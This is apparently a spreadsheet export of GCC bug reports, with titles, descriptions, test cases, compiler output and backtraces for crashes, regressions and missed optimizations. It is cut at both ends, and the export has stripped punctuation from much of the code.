LC\\.?\\.?0\\.b\\[0\\]\\.f\\[0\\]\\.x 1FAIL: gcc.dg/tree-ssa/sra-18.c scan-tree-dump-times esra SR\\.[0-9_]+ = \\*\\.?
LC\\.?\\.?0\\.b\\[0\\]\\.f\\[1\\]\\.x 1FAIL: gcc.dg/tree-ssa/sra-18.c scan-tree-dump-times esra SR\\.[0-9_]+ = \\*\\.?
LC\\.?\\.?0\\.b\\[1\\]\\.f\\[0\\]\\.x 1FAIL: gcc.dg/tree-ssa/sra-18.c scan-tree-dump-times esra SR\\.[0-9_]+ = \\*\\.?LC\\.?\\.?0\\.b\\[1\\]\\.f\\[1\\]\\.x 1</t>
  </si>
  <si>
    <t>GCC-7422</t>
  </si>
  <si>
    <t>strstreambuf frees buffer when beeing in frozen state</t>
  </si>
  <si>
    <t>The attached sample program shows that strstreambuf frees his buffer also he was forced to frozen mode by calling the str() method. Because of that the generated string can be overwritten by code that reallocates this memory.
This is a regression to gcc 3.1!
I have not checked that but possibly this is related to http://gcc.gnu.org/ml/gcc-patches/2002-05/msg01204.html and/or http://gcc.gnu.org/ml/libstdc++/2002-06/msg00089.html.
Release:
3.1.1
Environment:
System: independent
Architecture: independent
host: independent
build: independent
target: independent
Configured with: /home/schiele/gcccvs/gcc-3.1.1/configure --enable-threads=posix --prefix=/opt/Pkg/Linux/i686/gcc311 --enable-languages=cc++f77objc --disable-libgcj --with-gxx-include-dir=/opt/Pkg/Linux/i686/gcc311/include/g++ --with-system-zlib --enable-shared --enable-__cxa_atexit i486-suse-linux
How-To-Repeat:
# g++ -o strstreambug strstreambug.cc
[header warning]
# ./strstreambug
s(0x804a118):Text
s(0x804a118):×¡×¢×£×¤×¥×¦×§×¨×©×ªï¿½ï¿½â€Žâ€ï¿½
should be (gcc-3.1):
# ./strstreambug
s(0x804a118):Text
s(0x804a118):Text</t>
  </si>
  <si>
    <t>GCC-47936</t>
  </si>
  <si>
    <t>[4.6 Regression] Missed optimization with LTO due to strict aliasing issues</t>
  </si>
  <si>
    <t>Created attachment 23497
Testcase
This seems to be different from bug 47924.</t>
  </si>
  <si>
    <t>GCC-67834</t>
  </si>
  <si>
    <t>Local references inside comdat groups</t>
  </si>
  <si>
    <t>Created attachment 36442
Preprocessed source
With the switch to gcc-5 on Debian we are seeing a number of c++ packages
fail to build with the following error:
_ZXXX referenced in section `.data.rel.ro.local' of YYY: defined in discarded section `.text._ZXXX
Here is the assembler code for _ZN3uhd9transport3sphL19handle_overflow_nopEv:
       .section        .text._ZN3uhd9transport3sphL19handle_overflow_nopEvaxG@progbits_ZN3uhd9transport3sph19recv_packet_handler6resizeEjcomdat
       .align 4        .type   _ZN3uhd9transport3sphL19handle_overflow_nopEv @function
.LFB8296:
       .file 6 /home/dave/debian/uhd/uhd-3.9.1/host/lib/usrp/usrp1/../../transport/super_recv_packet_handler.hpp
       .loc 6 61 0
       .cfi_startproc
_ZN3uhd9transport3sphL19handle_overflow_nopEv:
       .PROC
       .CALLINFO FRAME=0NO_CALLS
       .ENTRY
       bvn %r0(%r2)
       .EXIT
       .PROCEND        .cfi_endproc
.LFE8296:
       .size   _ZN3uhd9transport3sphL19handle_overflow_nopEv .-_ZN3uhd9transport3sphL19handle_overflow_nopEv
Subsequently there is a reference from a plabel in .data.rel.ro.local:
       .section        .data.rel.ro.local
       .align 4
.LC135:
       .word   P%_ZN3uhd9transport3sphL19handle_overflow_nopEv
COMDAT group section [   10] `.group' [_ZN3uhd9transport3sph19recv_packet_handler6resizeEj] contains 2 sections:
   [Index]    Name
   [  581]   .text._ZN3uhd9transport3sphL19handle_overflow_nopEv
   [ 1282]   .text._ZN3uhd9transport3sph19recv_packet_handler6resizeEj
It is my understanding that local references into COMDAT groups are not allowed.
HPPA is probably particularly sensitive to this because of the P PLABEL32
reloc.
Compile command:
/usr/bin/c++   -DHAVE_CONFIG_H -DIHEX_USE_STDBOOL -DUHD_DLL_EXPORTS -DUHD_IMAGES_DIR=OFF -DUHD_VERSION=30901 -g -O2 -Wformat -Werror=format-security -D_FORTIFY_SOURCE=2  -fvisibility=hidden -fvisibility-inlines-hidden -fPIC -I/home/dave/debian/uhd/uhd-3.9.1/build/include -I/home/dave/debian/uhd/uhd-3.9.1/host/include -I/home/dave/debian/uhd/uhd-3.9.1/build/lib/ic_reg_maps -I/home/dave/debian/uhd/uhd-3.9.1/host/lib/convert -I/home/dave/debian/uhd/uhd-3.9.1/build/lib/convert -I/home/dave/debian/uhd/uhd-3.9.1/build/lib/transport/nirio/lvbitx -I/usr/include/libusb-1.0 -I/home/dave/debian/uhd/uhd-3.9.1/host/lib/usrp -I/home/dave/debian/uhd/uhd-3.9.1/host/lib/usrp/cores -I/home/dave/debian/uhd/uhd-3.9.1/host/../firmware/fx2/common -I/home/dave/debian/uhd/uhd-3.9.1/host/lib/usrp/common -I/home/dave/debian/uhd/uhd-3.9.1/host/lib/usrp/common/ad9361_driver    -Wall -Wextra -Wsign-compare -o CMakeFiles/uhd.dir/usrp/usrp1/io_impl.cpp.o -c /home/dave/debian/uhd/uhd-3.9.1/host/lib/usrp/usrp1/io_impl.cpp</t>
  </si>
  <si>
    <t>GCC-4903</t>
  </si>
  <si>
    <t>ICE in grokdeclarator at cp/decl.c:9799</t>
  </si>
  <si>
    <t>template 
struct A
{
  template 
  struct B
  {
    A::template B foo(void)
  }
}
template  template 
A::template B A::B::foo(void)
{
  return A::template B() // error here
}
int main()
{
  A::template B b
  b.foo()
}
This reports Internal compiler error 19990331
Release:
2.95.3-6
Environment:
irrelevant</t>
  </si>
  <si>
    <t>theverylittleone</t>
  </si>
  <si>
    <t>GCC-13788</t>
  </si>
  <si>
    <t>Zero propogate right shift in static final int initializer causes error</t>
  </si>
  <si>
    <t>Overview description
--------------------
Using the zero propogate right shift operator (&gt;&gt;&gt;) with constant operands
in a static final int initializer causes a compilation error in gcj.
Steps to reproduce
------------------
1) Create the RShiftInInitializer.java source file with the following contents:
class RShiftInIntInitializer {
  private static final int  DUMMY1 = 1 &gt;&gt;&gt; 1
  public static void main(String [] args) {
    System.out.println(DUMMY1)
  }
}
2) Run the following gcj command:
gcj --main=RShiftInIntInitializer RShiftInIntInitializer.java
Actual results
--------------
The gcj command produced the following output:
RShiftInIntInitializer.java: In class `RShiftInIntInitializer':
RShiftInIntInitializer.java: In method `()':
RShiftInIntInitializer.java:2: error: Incompatible type for declaration.
Explicit cast needed to convert `unsigned int' to `int'.
     private static final int  DUMMY1 = 1 &gt;&gt;&gt; 1
                               ^
1 error
Expected results
----------------
I expect gcj to produce no error messages and create an a.out file that when
run would produce the following output:
0
This is what happened when I used the javac and java tools from Sun's J2SE SDK
v1.4.1 to compile and run the RShiftInInitializer.java code.
Version and platform
--------------------
Version of GCC: 3.4.0 20040114 (experimental)
System type: i686-pc-linux-gnu
Options given when GCC was configured:
../gcc-3.4-20040114/configure --prefix=/home/andrewg/gcc-3.4-20040114-install
--enable-threads=posix --enable-shared --enable-languages=c++java
The problem was also seen with the following versions of GCC:
3.2.2 20030222 (Red Hat Linux 3.2.2-5)
3.3.2</t>
  </si>
  <si>
    <t>aj_oz</t>
  </si>
  <si>
    <t>GCC-71421</t>
  </si>
  <si>
    <t>trunk bootstrap is broken</t>
  </si>
  <si>
    <t>/home/segher/src/gcc/gcc/expr.c: In member function 'virtual void move_by_pieces_d::generate(rtx rtx machine_mode)':
/home/segher/src/gcc/gcc/expr.c:1146:60: error: unused parameter 'mode' [-Werror=unused-parameter]
 move_by_pieces_d::generate (rtx op0 rtx op1 machine_mode mode)
                                                            ^~~~
(PUSH_ROUNDING is not defined for all targets).</t>
  </si>
  <si>
    <t>GCC-10867</t>
  </si>
  <si>
    <t>Internal compiler error with constant enum</t>
  </si>
  <si>
    <t>The attached file generates the following error:
conversion.cc:8: warning: all member functions in class `Conversion' are
   private
conversion.cc: In instantiation of `const unsigned int Conversion::
t':
conversion.cc:23:   instantiated from `Conversion'
conversion.cc:23:   instantiated from here
conversion.cc:15: Internal compiler error in instantiate_decl at cp/pt.c:10052
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
gcc version 3.2
Environment:
Cygwin</t>
  </si>
  <si>
    <t>GCC-36355</t>
  </si>
  <si>
    <t>matmul argument-check: wrong error messages</t>
  </si>
  <si>
    <t>$&gt; cat matmul.f90
  REAL DIMENSION(22) :: a
  character(1) :: b
  print * MATMUL(a b)      ! line 4: argument matrix_b is wrong
  print * MATMUL(b a)      ! line 5: argument matrix_a is wrong
end
$&gt; gfortran-svn matmul.f90
matmul.f90:4.18:
  print * MATMUL(a b)
                 1
Error: 'matrix_a' argument of 'matmul' intrinsic at (1) must be numeric or LOGICAL
matmul.f90:5.20:
  print * MATMUL(b a)
                   1
Error: 'matrix_b' argument of 'matmul' intrinsic at (1) must be numeric or LOGICAL
Proposed change (untested):
Index: check.c
===================================================================
--- check.c     (revision 136058)
+++ check.c     (working copy)
@@ -17617 +17617 @@ gfc_check_malloc (gfc_expr *size)
 try
 gfc_check_matmul (gfc_expr *matrix_a gfc_expr *matrix_b)
 {
-  if ((matrix_a-&gt;ts.type != BT_LOGICAL) &amp;&amp; !gfc_numeric_ts (&amp;matrix_b-&gt;ts))
+  if ((matrix_a-&gt;ts.type != BT_LOGICAL) &amp;&amp; !gfc_numeric_ts (&amp;matrix_a-&gt;ts))
     {
       gfc_error ('%s' argument of '%s' intrinsic at %L must be numeric 
                 or LOGICAL gfc_current_intrinsic_arg[0]
@@ -17697 +17697 @@ gfc_check_matmul (gfc_expr *matrix_a gf
       return FAILURE
     }
-  if ((matrix_b-&gt;ts.type != BT_LOGICAL) &amp;&amp; !gfc_numeric_ts (&amp;matrix_a-&gt;ts))
+  if ((matrix_b-&gt;ts.type != BT_LOGICAL) &amp;&amp; !gfc_numeric_ts (&amp;matrix_b-&gt;ts))
     {
       gfc_error ('%s' argument of '%s' intrinsic at %L must be numeric 
                 or LOGICAL gfc_current_intrinsic_arg[1]</t>
  </si>
  <si>
    <t>GCC-80901</t>
  </si>
  <si>
    <t>[8 Regression] ICE on valid code at -Os and above on x86_64-linux-gnu: in verify_loop_structure at cfgloop.c:1644</t>
  </si>
  <si>
    <t>$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/8.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 8.0.0 20170528 (experimental) [trunk revision 248544] (GCC) 
$ 
$ gcc-trunk -O1 small.c
$         
$ gcc-trunk -Os small.c
small.c: In function â€˜fn1.part.0â€™:
small.c:24:1: error: size of loop 1 should be 1 not 2
 }
 ^
small.c:24:1: internal compiler error: in verify_loop_structure at cfgloop.c:1644
0x7da19d verify_loop_structure()
	../../gcc-source-trunk/gcc/cfgloop.c:1644
0xb48b5f execute_function_todo
	../../gcc-source-trunk/gcc/passes.c:1985
0xb495b9 execute_todo
	../../gcc-source-trunk/gcc/passes.c:2023
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
---------------------------------------
int a b c d
int fn1 ()
{
  int f
  if (d)
    while (c)
      {
	for (f = 0 f &lt; 1 f++)
	  {
	    int g[70] = { 0 }
	    if (b)
	    else
	      {
		int h = !b
		for ( h h = 1)
	      }
	  }
	return 0
      }
  return a
}
int main ()
{
  fn1 ()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-50401</t>
  </si>
  <si>
    <t>SIGSEGV in resolve_transfer</t>
  </si>
  <si>
    <t>Created attachment 25277
just compile it
SIGSEGV in resolve_transfer</t>
  </si>
  <si>
    <t>GCC-48170</t>
  </si>
  <si>
    <t>ICE: in hoist_code at gcse.c:4524 with -fgcse --param max-hoist-depth={01}</t>
  </si>
  <si>
    <t>Created attachment 23701
reduced testcase
Compiler output:
$ gcc -O -fgcse --param max-hoist-depth=1 testcase.c 
testcase.c: In function 'bar':
testcase.c:10:1: internal compiler error: in hoist_code at gcse.c:4524
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The same happens for max-hoist-depth=1 though if I understand the documentation correctly 1 means depth 1 0 means unlimited (so maybe gcc_assert (MAX_HOIST_DEPTH &gt; 1) checks the value is not one of these extrems?).
Tested revisions:
r171088 - crash
4.6 r170955 - crash
4.5 - doesn't know max-hoist-depth</t>
  </si>
  <si>
    <t>GCC-78548</t>
  </si>
  <si>
    <t>[7 Regression ]ICE on valid C code on x86_64-linux-gnu at -O2 and -O3 in 64-bit mode with -Wall (*** Error in `/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/cc1': double free or corruption (fasttop): 0x0000000003c15810 ***)</t>
  </si>
  <si>
    <t>The following program crashes gcc in the 64-bit mode but causes gcc to hang in the 32-bit mode. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.0 20161127 (experimental) [trunk revision 242892] (GCC) 
$ 
$ gcc-trunk -Wall -w -O3 -m64 small.c
*** Error in `/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/cc1': double free or corruption (fasttop): 0x0000000003c15810 ***
small.c: In function â€˜mainâ€™:
small.c:6:5: internal compiler error: Aborted
 int main (  ) {
     ^~~~
0xbe8aff crash_signal
	../../gcc-source-trunk/gcc/toplev.c:333
0xe0ba36 xcallocator::data_free(gimple**)
	../../gcc-source-trunk/gcc/hash-table.h:273
0xe0ba36 ~hash_table
	../../gcc-source-trunk/gcc/hash-table.h:627
0xe0ba36 ~hash_set
	../../gcc-source-trunk/gcc/hash-set.h:25
0xe0ba36 find_def_preds
	../../gcc-source-trunk/gcc/tree-ssa-uninit.c:775
0xe0ba36 is_use_properly_guarded
	../../gcc-source-trunk/gcc/tree-ssa-uninit.c:2375
0xe0c17e find_uninit_use
	../../gcc-source-trunk/gcc/tree-ssa-uninit.c:2434
0xe0c17e warn_uninitialized_phi
	../../gcc-source-trunk/gcc/tree-ssa-uninit.c:2504
0xe0c17e execute
	../../gcc-source-trunk/gcc/tree-ssa-uninit.c:2612
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
$ cat small.c
char a
int b
unsigned c d
short e
int main_f
int main (  ) {
L0:
    if ( e )     goto L1
    b = c 
    if ( !c )     printf (  ( long long ) main_f )
    if ( d || !c )     {
        printf ( %llu\n ( long long ) main )
        goto L2
    }
    unsigned g = b
L1:
    b = g
L2:
    if ( b )     goto L0
  return 0
}</t>
  </si>
  <si>
    <t>GCC-217</t>
  </si>
  <si>
    <t>Compiler not following standards on templated constructor resolution</t>
  </si>
  <si>
    <t xml:space="preserve">
g++ -c bar.cxx produces:
bar.cxx: In function `void func ()':
bar.cxx:21: no matching function for call to `Bar::Bar (Bar)'
bar.cxx:10: candidates are: Bar::Bar (Bar &amp;) [with Y = int X =
bar.cxx:10: int]
bar.cxx:12:                 Bar::Bar (Bar &amp;) [with X = int]
According to the standard there should be no ambiguity:
One should try to resolve the call on non meta-templated
constructor first. Failing that go on to meta-templated ones.
I do apologize for not being able to produce the exact
ISO/IEC standard that talks about that...
BTW: I tried on older version of egcs and got a different
error message (gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)):
gcc -c bar.cxx
bar.cxx: In function `void func()':
bar.cxx:21: warning: initialization of non-const reference `class Bar &amp;' from rvalue `Bar'
bar.cxx:12: warning: in passing argument 1 of `Bar::Bar(Bar &amp;)'
Release:
gcc version 2.96 20000410 (experimental)
Environment:
Linux and SGI
How-To-Repeat:
See description</t>
  </si>
  <si>
    <t>hubert</t>
  </si>
  <si>
    <t>GCC-5133</t>
  </si>
  <si>
    <t>Problems with toupper</t>
  </si>
  <si>
    <t>The legal source file tl.C is rejected by gcc 3.0.3 and by gcc 3.1. gcc 2.95.3
accepts this code though. When I compile and link versus STLport 4.5
both gcc 3.0.3 and gcc 3.1 have no problem compiling the source
code. If the header file  is not included all compilers
compile the source code into a working executable. Therefore I guess
there is a coding error in libstdc++.
Release:
3.1 20011216 (experimental)
Environment:
System: Linux kiste 2.4.14 #5 Thu Nov 8 13:35:20 CET 2001 i686 unknown
Architecture: i686
SuSE 7.3
GNU ld version 2.11.90.0.29
Glibc 2.2.4
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-clocale=gnu --enable-languages=cc++f77objc
How-To-Repeat:
Source code tl.C
#include 
#include  // does work when this line is removed
#include 
#include 
int main()
{
    std::string s(Hallo)
    std::transform (s.begin() s.end() s.begin() std::tolower)
    std::transform (s.begin() s.end() s.begin() ::tolower)
}
g++ -v -W -Wall tl.C 
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-clocale=gnu --enable-languages=cc++f77objc
Thread model: posix
gcc version 3.1 20011216 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cc1plus -v -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -W -Wall -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ tl.C -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -quiet -dumpbase tl.C -W -Wall -version -o /tmp/cci4lLgB.s
GNU CPP version 3.1 20011216 (experimental) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.1 20011216 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 3.1 20011216 (experimental).
ignoring nonexistent directory NONE/include
ignoring nonexistent directory /usr/local/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/i686-pc-linux-gnu
 /usr/local/include/g++-v3/backward
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/include
 /usr/include
End of search list.
tl.C: In function `int main()':
tl.C:9: no matching function for call to `transform(
   std::__normal_iterator&lt;char* std::basic_string&lt;char 
   std::char_traits std::allocator &gt; &gt; 
   std::__normal_iterator&lt;char* std::basic_string&lt;char 
   std::char_traits std::allocator &gt; &gt; 
   std::__normal_iterator&lt;char* std::basic_string&lt;char 
   std::char_traits std::allocator &gt; &gt; )'</t>
  </si>
  <si>
    <t>GCC-25050</t>
  </si>
  <si>
    <t>CSHIFT not allowed in initialization expression</t>
  </si>
  <si>
    <t>using GNU Fortran 95 (GCC) 4.1.0 20051126 (prerelease)  with '-g -pedantic -std=f95' I get a bad / no diagnostic for the following invalid code:
module M
  integer parameter ::   A(22)=0
  integer parameter dimension(22) :: B = CSHIFT(A1)
end module M
END</t>
  </si>
  <si>
    <t>GCC-30328</t>
  </si>
  <si>
    <t>[4.2 Regression] bit-field: unassemblable assembly code</t>
  </si>
  <si>
    <t>gcc produces unassemblable assembly code. 
//testcase:
struct S
{
  signed int a:17
} x
typedef typeof (x.a) foo
template 
T* inc(T* p) { return p+1 }
int main ()
{
  foo x[2] = { 12 }
  int y[2] = { 12 }
  *inc(x)
  *inc(y)
  return 0
}
result
$ g++ -S bug.cpp
$ g++ -c bug.s
bug.s: Assembler messages:
bug.s:18: Error: symbol `__Z3incIiEPT_S1_' is already defined
gcc version: 4.2 20061212</t>
  </si>
  <si>
    <t>s__nakayama</t>
  </si>
  <si>
    <t>GCC-45489</t>
  </si>
  <si>
    <t>Default initialization of derived-type function result missing</t>
  </si>
  <si>
    <t>The following program fails because the function result in f is never initialized. It should be default initialized which works using other compilers.
  type A
    integer pointer:: p =&gt; null ()
    integer:: i=3
  end type A
  type(A):: x
  x=f()
  if (associated(x%p) .or. x%i /= 3) call abort ()
contains
  function f() result (fr)
    type(A):: fr
  end function f
end</t>
  </si>
  <si>
    <t>GCC-47388</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: in begin_for_stmt at cp/semantics.c:863 with -fno-for-scope and for() inside a template</t>
  </si>
  <si>
    <t>Created attachment 23054
reduced testcase
Compiler output:
$ gcc -fno-for-scope testcase.C
testcase.C: In function 'void foo()':
testcase.C:3:8: internal compiler error: in begin_for_stmt at cp/semantics.c:863
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
(gdb) bt
#0  fancy_abort (file=0x11f4eb0 /mnt/svn/gcc-trunk/gcc/cp/semantics.c line=863 function=0x11f78a3 begin_for_stmt)
    at /mnt/svn/gcc-trunk/gcc/diagnostic.c:892
#1  0x000000000062aa84 in begin_for_stmt (scope=0x0 init=0x7ffff5d76aa0) at /mnt/svn/gcc-trunk/gcc/cp/semantics.c:863
#2  0x00000000005ca0f5 in cp_parser_c_for (parser=0x7ffff5d90f78 in_statement_expr=0x0 in_compound= 
    if_p=) at /mnt/svn/gcc-trunk/gcc/cp/parser.c:8728
#3  cp_parser_for (parser=0x7ffff5d90f78 in_statement_expr=0x0 in_compound= 
    if_p=) at /mnt/svn/gcc-trunk/gcc/cp/parser.c:8717
#4  cp_parser_iteration_statement (parser=0x7ffff5d90f78 in_statement_expr=0x0 in_compound= 
    if_p=) at /mnt/svn/gcc-trunk/gcc/cp/parser.c:9016
#5  cp_parser_statement (parser=0x7ffff5d90f78 in_statement_expr=0x0 in_compound= 
    if_p=) at /mnt/svn/gcc-trunk/gcc/cp/parser.c:8075
#6  0x00000000005cab66 in cp_parser_statement_seq_opt (parser=0x7ffff5d90f78 in_statement_expr=0x0)
    at /mnt/svn/gcc-trunk/gcc/cp/parser.c:8416
#7  0x00000000005cac9c in cp_parser_compound_statement (parser=0x7ffff5d90f78 in_statement_expr=0x0 
    in_try=) at /mnt/svn/gcc-trunk/gcc/cp/parser.c:8370
#8  0x00000000005de70c in cp_parser_function_body (parser=0x7ffff5d90f78) at /mnt/svn/gcc-trunk/gcc/cp/parser.c:16399
#9  cp_parser_ctor_initializer_opt_and_function_body (parser=0x7ffff5d90f78) at /mnt/svn/gcc-trunk/gcc/cp/parser.c:16436
#10 0x00000000005dee82 in cp_parser_function_definition_after_declarator (parser=0x7ffff5d90f78 inline_p=0 '\000')
    at /mnt/svn/gcc-trunk/gcc/cp/parser.c:19842
#11 0x00000000005e04ce in cp_parser_function_definition_from_specifiers_and_declarator (parser=0x7ffff5d90f78 
    decl_specifiers=0x7fffffffd7b0 checks=0x0 function_definition_allowed_p=1 '\001' member_p=0 '\000' 
    declares_class_or_enum=0 function_definition_p=0x7fffffffd81f \001x\017\331\365\377\177 maybe_range_for_decl=0x0)
    at /mnt/svn/gcc-trunk/gcc/cp/parser.c:19771
#12 cp_parser_init_declarator (parser=0x7ffff5d90f78 decl_specifiers=0x7fffffffd7b0 checks=0x0 
    function_definition_allowed_p=1 '\001' member_p=0 '\000' declares_class_or_enum=0 
    function_definition_p=0x7fffffffd81f \001x\017\331\365\377\177 maybe_range_for_decl=0x0)
    at /mnt/svn/gcc-trunk/gcc/cp/parser.c:14538
#13 0x00000000005e4c75 in cp_parser_single_declaration (parser=0x7ffff5d90f78 checks=0x0 member_p=0 '\000' 
    explicit_specialization_p=0 '\000' friend_p=0x7fffffffd87f ) at /mnt/svn/gcc-trunk/gcc/cp/parser.c:20096
#14 0x00000000005e4fd6 in cp_parser_template_declaration_after_export (parser=0x7ffff5d90f78 member_p=0 '\000')
    at /mnt/svn/gcc-trunk/gcc/cp/parser.c:19946
#15 0x00000000005e9a3a in cp_parser_declaration (parser=0x7ffff5d90f78) at /mnt/svn/gcc-trunk/gcc/cp/parser.c:9444
#16 cp_parser_declaration (parser=0x7ffff5d90f78) at /mnt/svn/gcc-trunk/gcc/cp/parser.c:9395
#17 0x00000000005e833a in cp_parser_declaration_seq_opt (parser=0x7ffff5d90f78) at /mnt/svn/gcc-trunk/gcc/cp/parser.c:9374
#18 0x00000000005e9e89 in cp_parser_translation_unit () at /mnt/svn/gcc-trunk/gcc/cp/parser.c:3463
#19 c_parse_file () at /mnt/svn/gcc-trunk/gcc/cp/parser.c:25269
#20 0x00000000006be125 in c_common_parse_file () at /mnt/svn/gcc-trunk/gcc/c-family/c-opts.c:1071
#21 0x0000000000a213e6 in compile_file (argc=14 argv=0x7fffffffdad8) at /mnt/svn/gcc-trunk/gcc/toplev.c:579
#22 do_compile (argc=14 argv=0x7fffffffdad8) at /mnt/svn/gcc-trunk/gcc/toplev.c:1874
#23 toplev_main (argc=14 argv=0x7fffffffdad8) at /mnt/svn/gcc-trunk/gcc/toplev.c:1937
#24 0x00007ffff65f1bbd in __libc_start_main () from /lib/libc.so.6
#25 0x00000000004fa9d1 in _start ()
Tested revisions:
r169065 - crash
4.5 r168785 - OK</t>
  </si>
  <si>
    <t>GCC-79195</t>
  </si>
  <si>
    <t>make_array should not ask for common_type when the type is explicitly specified</t>
  </si>
  <si>
    <t>This does not compile:
#include 
struct A {}
struct B : A {}
struct C : A {}
auto arr = std::experimental::make_array(B{} C{})
because make_array's return type computes
conditional_t common_type_t _Dest&gt;
which instantiates common_type_t and results in a substitution failure. There shouldn't be a need to instantiate it when the desired element type is explicitly specified.</t>
  </si>
  <si>
    <t>GCC-27007</t>
  </si>
  <si>
    <t>Missed optimization of comparison with 'limited range'</t>
  </si>
  <si>
    <t>This function always returns 1 but gcc misses the optimization:
int foo(unsigned char x)
{
  return (x+1) != 0
}
fold-const.c converts the comparison to x != -1 but that's it.  shorten_compare() in c-common.c would optimize it but it doesn't get called.  fold-const.c has similar code on lines approx. 9307..9454 but is less general (and uglier) than shorten_compare() and misses this case.  tree-vrp.c says x is varying and doesn't help out either.
An example of this construct is line 527 of libmudflap/mf-runtime.c
        if (*optstr+1)
That looks like a buglet by the way.</t>
  </si>
  <si>
    <t>GCC-79963</t>
  </si>
  <si>
    <t>vec_eq_any extracts wrong CR bit when compiling with -mcpu=power9</t>
  </si>
  <si>
    <t>Tested with trunk 245979:
gcc/xgcc -Bgcc ../trunk/gcc/testsuite/gcc.target/powerpc/altivec-12.c -maltivec -lm -g -o ./altivec-12.exe
In test testsuite/gcc.target/powerpc/altivec-12.c line 50:
   CHECK_IF (vec_any_eq (h addf1))
For power9 we generate this code:
.L17:
        .loc 1 50 0 is_stmt 1
        addis 92.LC1@toc@ha
        ld 9.LC1@toc@l(9)
        lxv 120(9)
        addis 92addf1@toc@ha
        addi 99addf1@toc@l
        lxv 00(9)
        xvcmpeqsp. 0120
        mfcr 92
        rlwinm 99251
        xori 990x1
        extsw 99
        cmpdi 790
        bne 7.L18
        .loc 1 50 0 is_stmt 0 discriminator 1
        bl abort
In gdb I can see that h and addf1 are equal after loading and the comparison is correct however we are extracting the wrong bit from the cr with the rlwinm.
For power8 we generate this code:
.L17:
        .loc 1 50 0 is_stmt 1
        addis 92.LC1@toc@ha
        ld 9.LC1@toc@l(9)
        lxvd2x 009
        xxpermdi 12002
        addis 92addf1@toc@ha
        addi 99addf1@toc@l
        lxvd2x 009
        xxpermdi 0002
        xvcmpeqsp. 0120
        mfcr 92
        rlwinm 99271
        xori 990x1
        extsw 99
        cmpdi 790
        bne 7.L18
        .loc 1 50 0 is_stmt 0 discriminator 1
        bl abort
which runs correctly.</t>
  </si>
  <si>
    <t>GCC-71545</t>
  </si>
  <si>
    <t>[6/7 Regression] Incorrect irreflexive comparison debug check in std::lower_bound</t>
  </si>
  <si>
    <t>Compile the following with `g++-6 -D_GLIBCXX_DEBUG` and run the resulting program:
#include 
#include 
#include 
#include 
constexpr int TABLE_SIZE = 1
typedef int TableEntryNumber
int table[TABLE_SIZE] = {
    33
}
int main() {
    std::vector v = { 0 10 20 30 40 50 }
    // Find the first entry greater or equal to table[0]:
    auto it = std::lower_bound(
        v.begin() v.end() 0
        [] (int val TableEntryNumber tableIndex)
        {
            assert(tableIndex &lt; TABLE_SIZE)
            return val &lt; table[tableIndex]
        })
    std::cout &lt;&lt; *it &lt;&lt; std::endl // 40
}
Running this program results in:
  /usr/include/c++/6/bits/stl_algo.h:2029:
  Error: comparison doesn't meet irreflexive requirements assert(!(a &lt; a)).
  [...] Aborted
I think this is a false positive and would expect the program to print the result 40 instead.
In my reading of the standard the binary search algorithms do not require comp to induce a strict weak ordering on the sequence but merely require the sequence to be partitioned with respect to `comp(... value)`.
Thus these function should not perform the requires_irreflexive_pred debug check.
Workaround:
  I can make TableEntryNumber a struct containing an integer as the debug check is skipped if the two comparator arguments are incompatible types.</t>
  </si>
  <si>
    <t>daniel.grunwald</t>
  </si>
  <si>
    <t>GCC-19858</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE on simple SSE code</t>
  </si>
  <si>
    <t xml:space="preserve">
The code below when compiled by gcc -O3 -msse gives the following
error (same code compiles fine in gcc 3.3.5):
bug2.c: In function 'main':
bug2.c:17: error: Invalid reference prefix.
bug2.c:17: internal compiler error: verify_stmts failed.
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Environment:
System: Linux fftw.org 2.6.3-1-686-smp #2 SMP Tue Feb 24 20:29:08 EST 2004 i686 GNU/Linux
Architecture: i686
host: i686-pc-linux-gnu
